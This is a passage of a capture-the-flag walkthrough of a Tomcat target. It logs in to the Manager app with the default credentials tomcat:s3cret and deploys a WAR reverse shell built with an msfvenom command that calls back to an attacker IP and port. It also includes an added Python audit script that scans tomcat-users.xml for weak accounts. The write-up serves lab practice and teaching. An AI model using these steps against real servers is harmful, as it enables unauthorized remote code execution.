🔵jerry

Recon & Enum

port scan

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1

web (8080)

Apache Tomcat is running on the web page. I tried to access /host-manager and /manager with "admin:admin" and failed, but when I got to the page I got the default creds "tomcat:s3cret", and they worked for /manager.
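An added example, not part of the original write-up: a defender-side audit that scans a tomcat-users.xml for the credential pairs mentioned above and rates each hit by whether the account holds a Manager role that can deploy WAR files. The sample file, its extra users and the password-equals-username rule are assumptions constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Credential pairs named in this write-up; extend with your own list.
WEAK_PAIRS = {("admin", "admin"), ("tomcat", "s3cret")}
# Tomcat roles that allow deploying a WAR through the Manager app.
DEPLOY_ROLES = {"manager-gui", "manager-script", "manager"}

# Constructed sample input, not taken from the target host.
SAMPLE = """<tomcat-users xmlns="http://tomcat.apache.org/xml">
  <role rolename="manager-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,admin-gui"/>
  <user username="deploy" password="deploy" roles="manager-script"/>
  <user username="monitor" password="monitor" roles="manager-status"/>
  <user username="ops" password="c0rrect-h0rse-battery" roles="manager-gui"/>
</tomcat-users>"""


def local(tag):
    """Strip an XML namespace so files with and without xmlns both parse."""
    return tag.rsplit("}", 1)[-1]


def audit(xml_text):
    """Return (username, severity, reason) for each risky <user> entry."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if local(el.tag) != "user":
            continue
        # Older files use name= instead of username=.
        user = el.get("username") or el.get("name") or ""
        pw = el.get("password", "")
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        if (user, pw) in WEAK_PAIRS:
            reason = "known default credential pair"
        elif pw == "" or pw.lower() == user.lower():
            reason = "empty password or password equals username"
        else:
            continue
        # A weak account that can deploy WARs means code execution on the host.
        severity = "HIGH" if roles & DEPLOY_ROLES else "MEDIUM"
        findings.append((user, severity, reason))
    return findings


if __name__ == "__main__":
    for user, sev, reason in audit(SAMPLE):
        print(f"[{sev}] {user}: {reason}")
```

Run it against the real conf/tomcat-users.xml by passing the file's contents to `audit()`; any HIGH finding is an account that can reach the WAR upload form used in the next step.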

initial access

After getting in, I found file upload functionality which says "select WAR file to upload", so I created the reverse shell:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.8 LPORT=9002 -f war > rev_shell.war

WAR

A Web Application Resource (WAR) file is a single file container that holds all the potential files necessary for a Java-based web application. It can have Java Archives (.jar), Java Server Pages (.jsp), Java Servlets, Java classes, webpages, css, etc.

To deploy the reverse shell we have to visit the URL:

http://10.10.10.95:8080/rev_shell/

But we still didn't get the reverse shell. This is because the WAR file uses JSP (JavaServer Pages), and we have to manually add the JSP location of our file (the reverse shell). To get the name of the JSP page:

Let's add the JSP name to our URL path

Flags
